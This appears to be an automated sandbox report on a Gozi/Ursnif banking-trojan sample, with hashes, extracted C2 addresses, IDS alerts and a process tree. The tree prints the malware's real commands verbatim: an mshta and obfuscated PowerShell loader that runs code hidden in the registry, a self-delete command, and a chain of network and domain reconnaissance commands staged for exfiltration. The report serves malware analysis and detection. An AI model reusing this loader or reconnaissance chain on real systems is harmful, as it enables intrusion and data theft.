Analysis
-
max time kernel
152s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
22/03/2022, 15:41
Static task
static1
Behavioral task
behavioral1
Sample
d41d05cc157f874f89c574c74c0e2c58.exe
Resource
win7-20220311-en
General
-
Target
d41d05cc157f874f89c574c74c0e2c58.exe
-
Size
739KB
-
MD5
d41d05cc157f874f89c574c74c0e2c58
-
SHA1
1e0df409d72db144f570b9d8410b544c8670e64d
-
SHA256
0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
-
SHA512
fa36e9217d4af43d14870e0fdc380e3ce25674ca0ff55faba604e3b025be06e9c01fadb2807a6809962defc353ca21ea85218115e3624961d6989484115f20ba
Malware Config
Extracted
gozi_ifsb
777999
config.edge.skype.com
146.70.35.138
146.70.35.142
-
base_path
/phpadmin/
-
build
250225
-
exe_type
loader
-
extension
.src
-
server_id
50
Extracted
gozi_ifsb
777999
config.edge.skype.com
67.43.234.14
67.43.234.37
67.43.234.47
-
base_path
/images/
-
build
250225
-
exe_type
worker
-
extension
.src
-
server_id
50
Signatures
-
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
-
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
-
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
-
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1268 set thread context of 1648 1268 d41d05cc157f874f89c574c74c0e2c58.exe 80 PID 1464 set thread context of 3032 1464 powershell.exe 39 PID 3032 set thread context of 3428 3032 Explorer.EXE 35 PID 3032 set thread context of 5092 3032 Explorer.EXE 98 PID 3032 set thread context of 3752 3032 Explorer.EXE 33 PID 3032 set thread context of 3944 3032 Explorer.EXE 30 PID 5092 set thread context of 3440 5092 cmd.exe 100 PID 3032 set thread context of 1036 3032 Explorer.EXE 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 3076 net.exe 1660 net.exe 3616 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3560 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4256 systeminfo.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3440 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3440 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1648 d41d05cc157f874f89c574c74c0e2c58.exe 1648 d41d05cc157f874f89c574c74c0e2c58.exe 1464 powershell.exe 1464 powershell.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3032 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 1464 powershell.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 5092 cmd.exe 3032 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1464 powershell.exe Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeDebugPrivilege 3560 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3032 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1268 wrote to memory of 1648 1268 d41d05cc157f874f89c574c74c0e2c58.exe 80 PID 1268 wrote to memory of 1648 1268 d41d05cc157f874f89c574c74c0e2c58.exe 80 PID 1268 wrote to memory of 1648 1268 d41d05cc157f874f89c574c74c0e2c58.exe 80 PID 1268 wrote to memory of 1648 1268 d41d05cc157f874f89c574c74c0e2c58.exe 80 PID 1268 wrote to memory of 1648 1268 d41d05cc157f874f89c574c74c0e2c58.exe 80 PID 4748 wrote to memory of 1464 4748 mshta.exe 92 PID 4748 wrote to memory of 1464 4748 mshta.exe 92 PID 1464 wrote to memory of 3680 1464 powershell.exe 94 PID 1464 wrote to memory of 3680 1464 powershell.exe 94 PID 3680 wrote to memory of 3864 3680 csc.exe 95 PID 3680 wrote to memory of 3864 3680 csc.exe 95 PID 1464 wrote to memory of 208 1464 powershell.exe 96 PID 1464 wrote to memory of 208 1464 powershell.exe 96 PID 208 wrote to memory of 2044 208 csc.exe 97 PID 208 wrote to memory of 2044 208 csc.exe 97 PID 1464 wrote to memory of 3032 1464 powershell.exe 39 PID 1464 wrote to memory of 3032 1464 powershell.exe 39 PID 1464 wrote to memory of 3032 1464 powershell.exe 39 PID 1464 wrote to memory of 3032 1464 powershell.exe 39 PID 3032 wrote to memory of 3428 3032 Explorer.EXE 35 PID 3032 wrote to memory of 3428 3032 Explorer.EXE 35 PID 3032 wrote to memory of 5092 3032 Explorer.EXE 98 PID 3032 wrote to memory of 5092 3032 Explorer.EXE 98 PID 3032 wrote to memory of 5092 3032 Explorer.EXE 98 PID 3032 wrote to memory of 3428 3032 Explorer.EXE 35 PID 3032 wrote to memory of 3428 3032 Explorer.EXE 35 PID 3032 wrote to memory of 3752 3032 Explorer.EXE 33 PID 3032 wrote to memory of 3752 3032 Explorer.EXE 33 PID 3032 wrote to memory of 5092 3032 Explorer.EXE 98 PID 3032 wrote to memory of 5092 3032 Explorer.EXE 98 PID 5092 wrote to memory of 3440 5092 cmd.exe 100 PID 5092 wrote to memory of 3440 5092 cmd.exe 100 PID 5092 wrote to memory of 3440 5092 cmd.exe 100 PID 3032 wrote to memory of 3752 3032 Explorer.EXE 33 PID 3032 wrote to memory of 3752 3032 Explorer.EXE 33 PID 3032 wrote to memory of 3944 3032 Explorer.EXE 30 PID 3032 wrote to memory of 3944 3032 Explorer.EXE 30 PID 3032 wrote to memory of 3944 3032 Explorer.EXE 30 PID 3032 wrote to memory of 3944 3032 Explorer.EXE 30 PID 5092 wrote to memory of 3440 5092 cmd.exe 100 PID 5092 wrote to memory of 3440 5092 cmd.exe 100 PID 3032 wrote to memory of 4524 3032 Explorer.EXE 101 PID 3032 wrote to memory of 4524 3032 Explorer.EXE 101 PID 4524 wrote to memory of 1308 4524 cmd.exe 103 PID 4524 wrote to memory of 1308 4524 cmd.exe 103 PID 3032 wrote to memory of 3548 3032 Explorer.EXE 104 PID 3032 wrote to memory of 3548 3032 Explorer.EXE 104 PID 3032 wrote to memory of 3224 3032 Explorer.EXE 107 PID 3032 wrote to memory of 3224 3032 Explorer.EXE 107 PID 3032 wrote to memory of 1036 3032 Explorer.EXE 108 PID 3032 wrote to memory of 1036 3032 Explorer.EXE 108 PID 3032 wrote to memory of 1036 3032 Explorer.EXE 108 PID 3032 wrote to memory of 1036 3032 Explorer.EXE 108 PID 3224 wrote to memory of 4256 3224 cmd.exe 110 PID 3224 wrote to memory of 4256 3224 cmd.exe 110 PID 3032 wrote to memory of 1036 3032 Explorer.EXE 108 PID 3032 wrote to memory of 1036 3032 Explorer.EXE 108 PID 3032 wrote to memory of 4156 3032 Explorer.EXE 114 PID 3032 wrote to memory of 4156 3032 Explorer.EXE 114 PID 3032 wrote to memory of 1572 3032 Explorer.EXE 116 PID 3032 wrote to memory of 1572 3032 Explorer.EXE 116 PID 1572 wrote to memory of 3076 1572 cmd.exe 118 PID 1572 wrote to memory of 3076 1572 cmd.exe 118 PID 3032 wrote to memory of 3412 3032 Explorer.EXE 119
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3944
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3752
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rnxokhs -value gp; new-alias -name ciaisbj -value iex; ciaisbj ([System.Text.Encoding]::ASCII.GetString((rnxokhs "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp" "c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP"5⤵PID:3864
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP"5⤵PID:2044
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3440
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\96B8.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1308
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\96B8.bi1"2⤵PID:3548
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:4256
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1036
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:4156
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:3076
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:3412
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:2360
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:428
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:4860
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:2688
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:3620
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:5068
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:1528
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:948
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:868
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:4732
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:3696
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:220
-
C:\Windows\system32\net.exenet config workstation3⤵PID:1812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:2584
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:2072
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:4208
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:4080
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:4852
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:4264
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:3592
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:3572
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:4524
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:1660
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:3972
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:2788
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:3616
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:980
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\48C0.bin1 > C:\Users\Admin\AppData\Local\Temp\48C0.bin & del C:\Users\Admin\AppData\Local\Temp\48C0.bin1"2⤵PID:1800
-